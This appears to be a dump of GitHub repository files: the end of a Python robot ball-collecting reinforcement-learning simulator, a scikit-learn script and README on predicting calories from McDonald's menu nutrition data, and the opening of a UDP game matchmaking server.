in self.blue_balls:\n if self.state_blink == False or random.random() > (0.3 + 0.05*b_ball[1]/3.0/(map_param[\"height\"]/2)):\n if b_ball[1] >= int(ball_blind_slope*(abs(1.0*b_ball[0])-ball_blind_bias)):\n b_ball_x = b_ball[0]\n b_ball_y = b_ball[1]\n if self.state_inaccurate:\n b_ball_x = b_ball_x + random.random()*map_param[\"center\"]*(0.1*b_ball_x*b_ball_x/map_param[\"center\"]/map_param[\"center\"] - 0.05)\n b_ball_y = b_ball_y + random.random()*map_param[\"center\"]*(0.1*b_ball_y*b_ball_y/map_param[\"center\"]/map_param[\"center\"] - 0.05)\n cx = simulator[\"center\"] + int(round(1.0*b_ball_x/trans_scale))\n cy = simulator[\"height\"] - back_pixels - int(round(1.0*b_ball_y/trans_scale))\n if self.check_window_state(cx, cy):\n self.frame[cx][cy] = self._params[\"Map.data.blue_ball\"]\n\n self.frame[simulator[\"center\"]][simulator[\"height\"]-back_pixels] = 255\n\n self.draw_state_gray()\n\n return self.frame\n\n def get_reward(self, action):\n reward = 0\n red_balls_temp = []\n blue_balls_temp = []\n\n # reward for red ball\n for i, r_ball in enumerate(self.red_balls):\n cx = round(1.0*r_ball[0]/trans_scale)\n cy = round(1.0*r_ball[1]/trans_scale)\n if cy < reward_region_y and cy >= 0 and r_ball[1] >= int(ball_blind_slope*(abs(1.0*r_ball[0])-ball_blind_bias)-2) and (cx in reward_region_x):\n if cx == reward_region_x[1]:\n reward += 10\n else:\n reward += 7\n # For sorting plate\n if len(self.red_balls_prev) > 0 and int(round(1.0*self.red_balls_prev[i][1]/trans_scale)) < reward_region_y or\\\n self.sorting_plate_state != sorting_plate_state_dic['RED']:\n reward = -2\n else:\n red_balls_temp.append(r_ball)\n\n # reward for blue ball\n for i, b_ball in enumerate(self.blue_balls):\n cx = round(1.0*b_ball[0]/trans_scale)\n cy = round(1.0*b_ball[1]/trans_scale)\n if cy < reward_region_y and cy >=0 and b_ball[1] >= int(ball_blind_slope*(abs(1.0*b_ball[0])-ball_blind_bias)-2) and (cx in reward_region_x):\n if cx == reward_region_x[1]:\n reward += 10\n else:\n reward += 7\n if len(self.blue_balls_prev) > 0 and int(round(1.0*self.blue_balls_prev[i][1]/trans_scale)) < reward_region_y or\\\n self.sorting_plate_state != sorting_plate_state_dic['BLUE']:\n reward = -2\n else:\n blue_balls_temp.append(b_ball)\n\n self.red_balls = red_balls_temp\n self.blue_balls = blue_balls_temp\n\n red_balls_inscreen = []\n blue_balls_inscreen = []\n for r_ball in red_balls_temp:\n if r_ball[1] >= ball_blind_slope * (abs(1.0*r_ball[0]) - ball_blind_bias)\\\n and abs(1.0*r_ball[0]) <= map_param[\"center\"] and abs(1.0*r_ball[1]) < map_param[\"height\"]:\n red_balls_inscreen.append(r_ball)\n for b_ball in blue_balls_temp:\n if b_ball[1] >= ball_blind_slope * (abs(1.0*b_ball[0]) - ball_blind_bias)\\\n and abs(1.0*b_ball[0]) <= map_param[\"center\"] and abs(1.0*b_ball[1]) < map_param[\"height\"]:\n blue_balls_inscreen.append(b_ball)\n\n if action in range(self.action_space.size):\n if len(red_balls_inscreen) == 0 and len(blue_balls_inscreen) == 0:\n self.ball_inscreen_flag = self.ball_inscreen_flag + 1\n if action == 8:\n reward += 0.001\n else:\n self.ball_inscreen_flag = 0\n\n if (len(red_balls_temp) == 0 and len(blue_balls_temp) == 0) or self.iter > max_iter or self.ball_inscreen_flag >= 10:\n self.done = True\n\n if self.done:\n self.episode_rewards.append(self.score)\n if self.write_flag:\n self.video.release()\n print (\"video saved\")\n\n if action == -1:\n return -1\n else:\n return reward\n\n def get_reward_wit(self, action):\n reward = 0\n red_balls_temp = []\n blue_balls_temp = []\n\n # Give reward if we 
move closer to the nearest ball\n ball_list = np.concatenate([x for x in [self.red_balls, self.blue_balls] if len(x) > 0]).tolist()\n found_flag = False\n if ball_list:\n ball_distances = np.sum(np.asarray(ball_list)**2, axis=1)\n sorted_indices = np.argsort(ball_distances)\n for index in sorted_indices:\n if in_camera_range(ball_list[index]) and no_wall_blocking([0, 0], ball_list[index], self.obstacles):\n if self.index_prev != -1:\n nearest_ball_cur = self.red_balls[index] if index < len(self.red_balls) else self.blue_balls[index - len(self.red_balls)]\n nearest_ball_prev = self.red_balls_prev[self.index_prev] if self.index_prev < len(self.red_balls_prev) else self.blue_balls_prev[self.index_prev - len(self.red_balls_prev)]\n d_cur = pow(nearest_ball_cur[0], 2) + pow(nearest_ball_cur[1], 2)\n d_prev = pow(nearest_ball_prev[0], 2) + pow(nearest_ball_prev[1], 2)\n if d_cur < d_prev and index == self.index_prev:\n reward += round(0.5*math.sqrt(d_prev - d_cur), 4)\n self.index_prev = index\n found_flag = True\n break\n if not found_flag:\n self.index_prev = -1\n\n # Give reward if the robot collect the ball\n for i, r_ball in enumerate(self.red_balls):\n # If any ball collectable\n if collectable(r_ball):\n if i == self.index_prev:\n self.index_prev = -1\n reward += calculate_reward(r_ball)\n # No reward for sorting plate yet\n else:\n red_balls_temp.append(r_ball)\n\n for i, b_ball in enumerate(self.blue_balls):\n if collectable(b_ball):\n if i + len(self.red_balls) == self.index_prev:\n self.index_prev = -1\n reward += calculate_reward(b_ball)\n # No reward for sorting plate yet\n else:\n blue_balls_temp.append(b_ball)\n\n # Remaining balls --------------------------------------------------------------------\n self.red_balls = red_balls_temp # list\n self.blue_balls = blue_balls_temp\n\n red_balls_inscreen = []\n blue_balls_inscreen = []\n for r_ball in red_balls_temp:\n if r_ball[1] >= ball_blind_slope*(abs(1.0*r_ball[0]) - ball_blind_bias) and abs(1.0*r_ball[0]) <= map_param[\"center\"] and abs(1.0*r_ball[1]) < map_param[\"height\"]:\n red_balls_inscreen.append(r_ball)\n for b_ball in blue_balls_temp:\n if b_ball[1] >= ball_blind_slope*(abs(1.0*b_ball[0]) - ball_blind_bias) and abs(1.0*b_ball[0]) <= map_param[\"center\"] and abs(1.0*b_ball[1]) < map_param[\"height\"]:\n blue_balls_inscreen.append(b_ball)\n\n if action in range(self.action_space.size):\n if len(red_balls_inscreen) == 0 and len(blue_balls_inscreen) == 0:\n self.ball_inscreen_flag = self.ball_inscreen_flag + 1\n if action == 8:\n reward += 0.001\n else:\n self.ball_inscreen_flag = 0\n\n if (len(red_balls_temp) == 0 and len(blue_balls_temp) == 0) or self.iter > max_iter: # or self.ball_inscreen_flag >= 10:\n self.done = True\n # Just for debugging to see why it stops\n if len(red_balls_temp) == 0 and len(blue_balls_temp) == 0:\n print('len(red_balls_temp) == 0 and len(blue_balls_temp) == 0')\n if self.iter > max_iter:\n print('self.iter > max_iter')\n if self.ball_inscreen_flag >= 10:\n print('self.ball_inscreen_flag >= 10')\n\n if self.done:\n self.episode_rewards.append(self.score)\n if self.write_flag:\n self.video.release()\n print (\"video saved\")\n\n if action == -1:\n return -1 # Penalize if doesn't move (I think because I bypass in the step funtion if action == -1, we won't reach this point)\n else:\n return reward\n \n def step(self, action):\n if action in range(self.action_space.size):\n self.iter = self.iter + 1\n\n del_x, del_y, rot = 0, 0, 0\n\n if action == 0: # forward\n del_x, del_y = 0, -1\n elif action == 
1: # forward right\n del_x, del_y = -1, -1\n elif action == 2: # right\n del_x, del_y = -1, 0\n elif action == 3: # backward right\n del_x, del_y = -1, 1\n elif action == 4: # backward\n del_x, del_y = 0, 1\n elif action == 5: # bacward left\n del_x, del_y = 1, 1\n elif action == 6: # left\n del_x, del_y = 1, 0\n elif action == 7: # forward left\n del_x, del_y = 1, -1\n elif action == 8: # rotate left\n rot = -1\n elif action == 9: # rotate right\n rot = 1\n elif action == 10:\n del_x, del_y, self.sorting_plate_state = 0, -1, sorting_plate_state_dic['RED']\n elif action == 11:\n del_x, del_y, self.sorting_plate_state = 0, -1, sorting_plate_state_dic['BLUE']\n else:\n del_x, del_y, rot = 0, 0, 0\n\n reward = 0\n if action not in [-1]: # Perform action if action not in this list\n red_balls_temp = []\n blue_balls_temp = []\n obstacles_temp = []\n\n del_x = del_x # * 10\n del_y = del_y # * 10\n\n if len(self.red_balls) > 0:\n red_balls_temp = np.add(self.red_balls, [del_x,del_y])\n\n if len(self.blue_balls) > 0:\n blue_balls_temp = np.add(self.blue_balls, [del_x,del_y])\n\n if len(self.obstacles) > 0:\n obstacles_temp = np.add(self.obstacles, [del_x,del_y])\n\n if action == 8 or action == 9:\n points = np.concatenate([x for x in [red_balls_temp, blue_balls_temp, obstacles_temp] if len(x) > 0])\n if points.size > 0:\n points = points.reshape(-1,2)\n theta = rot_scale*rot*np.pi/180\n theta_0 = np.arctan2(points.T[1], points.T[0])\n\n ball_dist = np.linalg.norm(points, axis=1)\n rot_delta_unit_x = np.subtract(np.cos(theta_0), np.cos(np.add(theta_0,theta)))\n rot_delta_unit_y = np.subtract(np.sin(theta_0), np.sin(np.add(theta_0,theta)))\n rot_delta_unit = np.concatenate((rot_delta_unit_x.reshape(-1,1), rot_delta_unit_y.reshape(-1,1)), axis=1)\n ball_dist = np.concatenate((ball_dist.reshape(-1,1), ball_dist.reshape(-1,1)), axis=1)\n rot_delta = np.multiply(ball_dist, rot_delta_unit)\n points = np.subtract(points, rot_delta)\n red_balls_temp = points[0:len(self.red_balls)] # This is numpy array. Be careful\n blue_balls_temp = points[len(self.red_balls):len(self.red_balls)+len(self.blue_balls)]\n obstacles_temp = points[len(self.red_balls)+len(self.blue_balls):]\n\n enable_move = True\n for obstacle in obstacles_temp:\n if abs(obstacle[0]) < R_X and abs(obstacle[1]) < R_Y: # Here, parameter is in map scale\n # if abs(1.0*obstacle[0]) < 4.0*trans_scale/3 and abs(1.0*obstacle[1]) < 8.0*trans_scale/3:\n enable_move = False\n\n if enable_move:\n self.red_balls = red_balls_temp # This is numpy array. Be careful\n self.blue_balls = blue_balls_temp\n reward = self.get_reward_wit(action)\n self.obstacles = obstacles_temp\n self.draw_state()\n self.red_balls_prev = self.red_balls\n self.blue_balls_prev = self.blue_balls\n else:\n # print('Cannot move') # Just for debugging\n # reward = self.get_reward_wit(-1) # Can we just bypass this if cannot move? 
Because nothing will change?\n reward = -2\n else:\n reward = -1 # Doesn't do anything\n\n self.score = self.score + reward\n self.current_reward = reward # Add by myself\n\n if self.write_flag:\n frame_debug = self.draw_debug_frame(self.frame)\n self.video.write(frame_debug)\n\n if self.debug_flag:\n frame_debug = self.draw_debug_frame(self.frame)\n # cv2.imshow(\"frame_debug\", frame_debug)\n cv2.imshow(\"frame_debug_gray\", self.frame_gray)\n cv2.imshow(\"frame_wit\", self.draw_environment()) # Add by myself\n cv2.waitKey(100)\n\n return self.frame_gray, reward, self.done\n\n def get_total_steps(self):\n return self.iter\n\n def get_episode_rewards(self):\n return self.episode_rewards\n\n def action_space_sample(self):\n index = int(1.0*random.random()*self.action_space.size)\n return self.action_space[index]\n \n\n# Added functions ##############################################################################\ndef closest_point(point, point_list):\n \"\"\"\n Return index of a point in the list that is closest to the given point, -1 if no such point\n \"\"\"\n if len(point_list):\n points = np.asarray(point_list)\n distances = np.sum((points - point)**2, axis=1)\n index = np.argmin(distances)\n return index\n else:\n return -1\n\n\ndef distance_from_point(point, point_list):\n \"\"\"\n Calculate all distances from point to each point in the point_list\n \"\"\"\n if len(point_list):\n return np.sum((np.asarray(point_list) - point)**2, axis=1)\n else:\n return []\n\n\ndef get_nearest_seeable_ball_index(point, point_list, obstacle_list):\n \"\"\"\n Get index of the nearest seeable ball in the point_list, -1 if no such ball\n \"\"\"\n if point_list:\n ball_distances = np.sum((np.asarray(point_list) - point)**2, axis=1)\n sorted_indices = np.argsort(ball_distances)\n for index in sorted_indices:\n if in_camera_range(point_list[index]) and no_wall_blocking([0, 0], point_list[index], obstacle_list):\n return index\n return -1\n else:\n return -1\n\n\ndef in_camera_range(pt):\n \"\"\"\n Check if pt is in the camera range\n\n Input: [x,y] in map scale\n \"\"\"\n if (pt[1] > 0) and (pt[1] > ball_blind_slope*(abs(pt[0]) - ball_blind_bias_map)):\n return True\n else:\n return False\n\n\ndef collectable(pt):\n \"\"\"\n Check if the ball can be collected\n\n Input: [x,y] in map scale\n \"\"\"\n if (R_Y <= pt[1] and pt[1] < R_Y + COLLECT_Y) and (pt[1] > ball_blind_slope*(abs(pt[0]) - ball_blind_bias_map)) and abs(pt[0]) <= COLLECT_X:\n return True\n else:\n return False\n\n\ndef calculate_reward(pt):\n \"\"\"\n Calculate reward for a ball at pt\n\n Input: [x,y] in map scale\n \"\"\"\n d = abs(pt[0])\n if d < COLLECT_X/3:\n return 10\n else:\n return 7\n\n\ndef no_wall_blocking(pt1, pt2, obstacles_list):\n \"\"\"\n Check if there is a wall blocking a path from pt1 to pt2\n\n Input: [x,y] in map scale\n \n Note: Valid only when the ball in front of the robot\n \"\"\"\n wall_integer = np.int_(np.round(obstacles_list)).tolist()\n loop_x = True if pt2[0]-pt1[0] >= pt2[1]-pt1[1] else False\n\n if loop_x: # Check above and below\n slope = (pt2[1] - pt1[1])/(pt2[0] - pt1[0])\n for x in range(int(round(pt1[0] + R_X)), int(round(pt2[0]))):\n y = int(round(slope*x))\n if ([x, y-1] in wall_integer) or ([x, y+1] in wall_integer):\n return False\n else: # Check left and right\n slope = (pt2[0] - pt1[0])/(pt2[1] - pt1[1])\n for y in range(int(round(pt1[1] + R_Y)), int(round(pt2[1]))):\n x = int(round(slope*y))\n if ([x-1, y] in wall_integer) or ([x+1, y] in wall_integer):\n return False\n return 
True\n\n###############################################################################################\n\n\nif __name__ == '__main__':\n tk = Task(debug_flag=True, test_flag=False, state_blink=False, state_inaccurate=False)\n tk.reset()\n\n action = -1\n while(1):\n tk.step(action)\n key = cv2.waitKey(300)&0xFF\n action = -1\n if key == ord('q') or tk.done == True:\n break\n \n elif key == ord('e'): # forward\n action = 0\n elif key == ord('r'): # forward right\n action = 1\n elif key == ord('w'): # forward left\n action = 7\n \n elif key == ord('f'): # right\n action = 2\n elif key == ord('s'): # left\n action = 6\n \n \n elif key == ord('d'): # backward\n action = 4\n elif key == ord('v'): # backward right\n action = 3\n elif key == ord('x'): # bacward left\n action = 5\n \n \n elif key == ord('a'): # Rotate left\n action = 8\n elif key == ord('g'): # Rotate right\n action = 9\n \n elif key == ord('1'):\n action = 10\n elif key == ord('2'):\n action = 11\n\n print(\"shutdown\")\n # cv2.destroyAllWindows()\n" } ]
2
declanoconnor/CaloriePrediction
https://github.com/declanoconnor/CaloriePrediction
6db733afe119ccdac98727a1ece994c217510f6c
7158977193ffeaf10aea2cb20dcaf7035b14c5ec
ee38fb78c56afc1772ccde43d8f1b9d005d727ab
refs/heads/master
2020-04-30T22:57:32.148519
2019-06-21T10:58:53
2019-06-21T10:58:53
177,132,315
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6815565824508667, "alphanum_fraction": 0.7076824903488159, "avg_line_length": 35.245033264160156, "blob_id": "0e1dea04fc860237b6e0a56e41ff7f9baae5274a", "content_id": "f63e98c80453481ffa459462322223a8b176f73e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10947, "license_type": "no_license", "max_line_length": 159, "num_lines": 302, "path": "/Correlation&Prediction.py", "repo_name": "declanoconnor/CaloriePrediction", "src_encoding": "UTF-8", "text": "#Libraries for Processing\nimport numpy as np #Linear algebra\nimport pandas as pd #Data processing\nfrom pandas.tools import plotting #CSV file I/O (e.g. pd.read_csv), data manipulation as in SQL\nimport matplotlib.pyplot as plt #For Plotting\nimport seaborn as sns #Additional Plotting\n#import keras\n#from keras.models import Sequential\n#from keras.layers import Dense\n\n#SKLEARN MODULES FOR MACHINE LEARNING\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm \nfrom sklearn.linear_model import LogisticRegression \nfrom sklearn.naive_bayes import GaussianNB \nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\n\n\nfrom sklearn.model_selection import train_test_split # to split the data into two parts\nfrom sklearn import metrics # for the check the error and accuracy of the model\n\n#OTHER TESTED FEATURES\n#from sklearn.model_selection import GridSearchCV# for tuning parameter\n#from sklearn.metrics import accuracy_score\n#from sklearn.metrics import average_precision_score\n#from sklearn.preprocessing import StandardScaler, LabelBinarizer\n#from sklearn.preprocessing import LabelEncoder\n#from sklearn.linear_model import LinearRegression\n\n#CLEANING UP\nimport warnings\nwarnings.filterwarnings('ignore')\n\n#%%\n\n#READ IN OUR DATA\ndata = pd.read_csv(\"C:/Users/user/Desktop/mdmenu.csv\",header=0) #here header 0 takes away first row\n\n#TEST DATA IS AS SHOWS\n#print(data.head(2))\n#data.info()\n#print(md.isnull().any())\n\n#%% FOR PLOTS ###\nfeatures_all=list(data.columns[1:14])\nprint(features_all)\ndata.describe()\n\nfeatures_corgraph=list(data.columns[1:16])\nprint(features_corgraph)\n\ndata.groupby('Category')['Item'].count().plot(kind='bar')\n\nsns.boxplot(data= data, x ='Category',y = 'Dietary Fiber')\nplt.tight_layout\nplt.show()\n\nMax_Cal = data.groupby('Category').max().sort_values('Dietary Fiber',ascending=False)\nsns.swarmplot(data =Max_Cal, x= Max_Cal.index,y = 'Calories', hue ='Item',size =10)\nplt.tight_layout()\n\nmeasures = ['Calories', 'Total Fat', 'Cholesterol','Sodium', 'Sugars', 'Carbohydrates']\n\nfor m in measures: \n plot = sns.violinplot(x=\"Category\", y=m, data=data)\n plt.setp(plot.get_xticklabels(), size=7)\n plt.title(m)\n plt.show()\n\nfor m in measures:\n g = sns.factorplot(x=\"Category\", y=m,data=data, kind=\"swarm\",size=5, aspect=2.5);\n \n#%% DAILY RECOMENDATIONS ###\n \nCaloriesPercentage = data['Calories'] / 2500 * 100\n\nTotalFatPercentage = data['Total Fat'] / 66 * 100\nSaturatedFatPercentage = data['Saturated Fat'] / 20 * 100\nCholesterolPercentage = data['Cholesterol'] / 300 * 100\nSodiumPercentage = data['Sodium'] / 2380 * 100\nCarbohydratesPercentage = data['Carbohydrates'] / 310 * 100\nDietaryFiberPercentage = data['Dietary Fiber'] / 30 * 100\n#print(CaloriesPercentage)\n\n\n#%% #KDE Plots ###\n\nf, axes = plt.subplots(2, 3, figsize=(10, 
6.666), sharex=True, sharey=True)\n\ns = np.linspace(0, 3, 10)\ncmap = sns.cubehelix_palette(start=0.0, light=1, as_cmap=True)\n\nx = CaloriesPercentage\ny = TotalFatPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, cut=5, ax=axes[0,0])\naxes[0,0].set(xlim=(-10, 50), ylim=(-30, 70), title = 'Fat')\n\nmap = sns.cubehelix_palette(start=0.333333333333, light=1, as_cmap=True)\n\n\nx = CaloriesPercentage\ny = SaturatedFatPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, ax=axes[0,1])\naxes[0,1].set(xlim=(-5, 50), ylim=(-10, 70), title = 'Saturated Fat')\n\ncmap = sns.cubehelix_palette(start=0.666666666667, light=1, as_cmap=True)\n\nx = CaloriesPercentage\ny = CholesterolPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, ax=axes[0,2])\naxes[0,2].set(xlim=(-5, 50), ylim=(-10, 70), title = 'Cholesterol')\n\ncmap = sns.cubehelix_palette(start=1.0, light=1, as_cmap=True)\n\nx = CaloriesPercentage\ny = SodiumPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, ax=axes[1,0])\naxes[1,0].set(xlim=(-5, 50), ylim=(-10, 70), title = 'Sodium')\n\ncmap = sns.cubehelix_palette(start=1.333333333333, light=1, as_cmap=True)\n\nx = CaloriesPercentage\ny = CarbohydratesPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, ax=axes[1,1])\naxes[1,1].set(xlim=(-5, 50), ylim=(-10, 70), title = 'Carbohydrates')\n\ncmap = sns.cubehelix_palette(start=1.666666666667, light=1, as_cmap=True)\n\nx = CaloriesPercentage\ny = DietaryFiberPercentage\nsns.kdeplot(x, y, cmap=cmap, shade=True, ax=axes[1,2])\naxes[1,2].set(xlim=(-5, 50), ylim=(-10, 70), title = 'Dietary Fiber')\n\nf.tight_layout()\n\n\n#%% Correlation Graph ###\n\ncorr = data[features_corgraph].corr()\nplt.figure(figsize=(15,15))\nsns.heatmap(corr, cbar = True, square = True, annot=True, fmt= '.2f',annot_kws={'size': 8},\n xticklabels= features_all, yticklabels= features_all,\n cmap= 'RdPu')\n\n#coolwarm\n\n#%% INITALISATION FOR MACHINE LEARNING ###\n\n#Adding in features that will \nprediction_var1 = ['Dietary Fiber (% Daily Value)','Vitamin A (% Daily Value)', 'Vitamin C (% Daily Value)', 'Calcium (% Daily Value)', 'Iron (% Daily Value)']\nprediction_var = ['Calories','Carbohydrates','Protein','Total Fat','Cholesterol',\n 'Sugars','Saturated Fat', 'Trans Fat',\n 'Dietary Fiber','Sodium']\ntrain, test = train_test_split(data, test_size = 0.2)\n(train.shape)\n(test.shape)\n\n#print(test.shape)\n#print(train.shape)\ntrain_X = train[prediction_var]\ntrain_y= train.Calories\ntest_X= test[prediction_var]\ntest_y= test.Calories\n\n#%% Random Forest Classifier ###\n\nmodel=RandomForestClassifier(n_estimators=100)\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------Random Forest------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\nimportances = model.feature_importances_\nstd = np.std([tree.feature_importances_ for tree in model.estimators_],\n axis=0)\nindices = np.argsort(importances)[::-1]\n\n# Print the feature ranking\nprint(\"Feature ranking:\")\n\nfor f in range(test_X.shape[1]):\n print(\"%d. 
feature %d (%f)\" % (f + 1, indices[f], importances[indices[f]]))\n\n# Plot the feature importances of the forest\nplt.figure()\nplt.title(\"Feature importances\")\nplt.bar(range(test_X.shape[1]), importances[indices],\n color=\"b\", yerr=std[indices], align=\"center\")\nplt.xticks(range(train_X.shape[1]), indices)\nplt.xlim([-1, test_X.shape[1]])\nplt.show()\n\n#%% Support Vector Machine ###\n\nmodel = svm.SVC(kernel='linear')\nmodel.fit(train_X,train_y)\nprint('')\nprint('------SVM------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% LogisticRegression ###\n\nmodel = LogisticRegression()\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------Logistic Regression------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% GaussianNaivebayes ###\n\nmodel = GaussianNB()\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------Gaussian NaiveBayes------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% DecisionTree ###\n\nmodel = DecisionTreeClassifier(max_leaf_nodes=3)\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------Decision Tree------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% ExtraTrees ###\n\nmodel = ExtraTreesClassifier()\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------Extra Tree Classifier------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% KNN ###\n\nmodel = KNeighborsClassifier()\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------KNN------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% MLP ###\nclf = MLPClassifier(#hidden_layer_sizes=(128,64,32), \n\t\t\t\t\tactivation='relu', \n solver='adam',\n \t\t\t\tbeta_1=0.6, \n \t\t\t\tbeta_2=0.9,\n alpha = 0.001,\n early_stopping = 
True,\n shuffle = True,\n warm_start = True,\n validation_fraction = 0.3,\n \t\t\t\tlearning_rate_init=0.01, \n \t\t\t\tmax_iter = 14000, \n \t\t\t\trandom_state = 1235, \n \t\t\t\tlearning_rate='adaptive' \n \t\t\t\t)\nmodel = clf\nmodel.fit(train_X,train_y)\nprediction=model.predict(test_X)\nprint('')\nprint('------MLP------')\nprint('Accuracy Classification - ',metrics.accuracy_score(prediction,test_y))\nprint('Accuracy Regression - ', metrics.explained_variance_score(prediction,test_y))\nprint('Accuracy Clustering - ', metrics.adjusted_mutual_info_score(prediction,test_y))\nprint('Macro F1 Score - ',metrics.f1_score(prediction,test_y, average='macro'))\n\n#%% Scatter Plot Matrix ###\n\ndata['Category']=data['Category'].map({'Breakfast':0,'Beef & Pork':1,'Chicken & Fish':2,'Salads':3,'Snacks & Sides':4,'Desserts':5,'Smoothies & Shakes':6})\ncolor_function = {0: \"blue\", 1: \"red\", 2: \"red\", 3: \"red\", 4: \"red\", 5: \"red\", 6: \"red\"}\ncolors = data[\"Category\"].map(lambda x: color_function.get(x))# mapping the color fuction with diagnosis column\npd.plotting.scatter_matrix(data[prediction_var], c=colors, alpha = 0.5, figsize = (15, 15)); # plotting scatter plot matrix\n\n" }, { "alpha_fraction": 0.8281829357147217, "alphanum_fraction": 0.8281829357147217, "avg_line_length": 268.6666564941406, "blob_id": "75ecb6c46b6a3655c8082a8d530959fb727ac3b7", "content_id": "d0e85ab20f104ad63a22f6ac4041f11e4ecf00a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 809, "license_type": "no_license", "max_line_length": 722, "num_lines": 3, "path": "/README.md", "repo_name": "declanoconnor/CaloriePrediction", "src_encoding": "UTF-8", "text": "An essay was written for this project, the following is the abstract from the paper:\n\nAnalyzing the nutritional structure of any consumer product is a laborious and costly process. Protein, carbohydrates, fats, sodium among other key elements are legally required and are determining factors for calorie content. Typically, a bomb calorimeter is used for accurate calorie measurement, however, calories can also be measured by nutritional content analysis. Currently, the approach for doing so is the Atwater System or similar revisions of this method. This paper proposes an alternative method by using existing ML techniques to determine caloric content. The proposal is tested on two popular fast-food menus, this paper then discusses the efficacy of the methods and hypothesises other probable solutions.\n" } ]
2
kossam001/GAME3110-Assignment3
https://github.com/kossam001/GAME3110-Assignment3
fe39b904f1df4fcf9f62435217d6c1ff93476f66
7e41dd7fd445d168dae4f7e46a3c5e03020c89a6
b547634b70ab9979132bbe9aab1b7e95e3f13ab8
refs/heads/main
2023-01-10T10:51:52.949440
2020-11-08T19:31:42
2020-11-08T19:31:42
310,436,260
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6126833558082581, "alphanum_fraction": 0.6239442825317383, "avg_line_length": 29.817352294921875, "blob_id": "0f62a8fc625526adfb1bf418f21c5bcd203228a9", "content_id": "abee336d0163a7915999b2765cd6d256b3fa32dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6749, "license_type": "no_license", "max_line_length": 123, "num_lines": 219, "path": "/serverA3.py", "repo_name": "kossam001/GAME3110-Assignment3", "src_encoding": "UTF-8", "text": "import requests\nimport random\nimport socket\nimport time\nfrom _thread import *\nimport threading\nfrom datetime import datetime\nimport json\n\nclients_lock = threading.Lock()\nconnected = 0\n\nclients = {}\n\nclass Matches:\n numMatches = 0\n matches = {}\n\nplayerTiers = {\n 500: {'waitTime' : 0, 'players' : []}, \n 1000: {'waitTime' : 0, 'players' : []}, \n 1500: {'waitTime' : 0, 'players' : []}\n } \n\ndef connectionLoop(sock):\n while True:\n\n # A player just connected to the server, find a game for them\n data, addr = sock.recvfrom(1024)\n data = json.loads(data)\n\n # Get user info from lambda function\n user_profile = requestAPI(data['user_id'])\n \n print(user_profile) \n print(addr)\n \n user_profile['address'] = addr \n user_profile['timeConnected'] = str(datetime.now())\n assignLobbyRoom(user_profile)\n\n #TODO: check that the player is still waiting in the lobby\n\ndef cleanClients(sock):\n while True:\n dropped_players = []\n for c in list(clients.keys()):\n if (datetime.now() - clients[c]['lastBeat']).total_seconds() > 10:\n\n # Track dropped player\n player = {}\n player['id'] = str(c)\n dropped_players.append(player)\n\n print('Dropped Client: ', c)\n clients_lock.acquire()\n del clients[c]\n clients_lock.release()\n\n # Message all connected clients about dropped clients\n if (len(dropped_players) > 0):\n message = {\"cmd\": 2, \"players\": dropped_players}\n m = json.dumps(message);\n for c in clients:\n sock.sendto(bytes(m, 'utf8'), (c[0], c[1]))\n \n time.sleep(5)\n\ndef 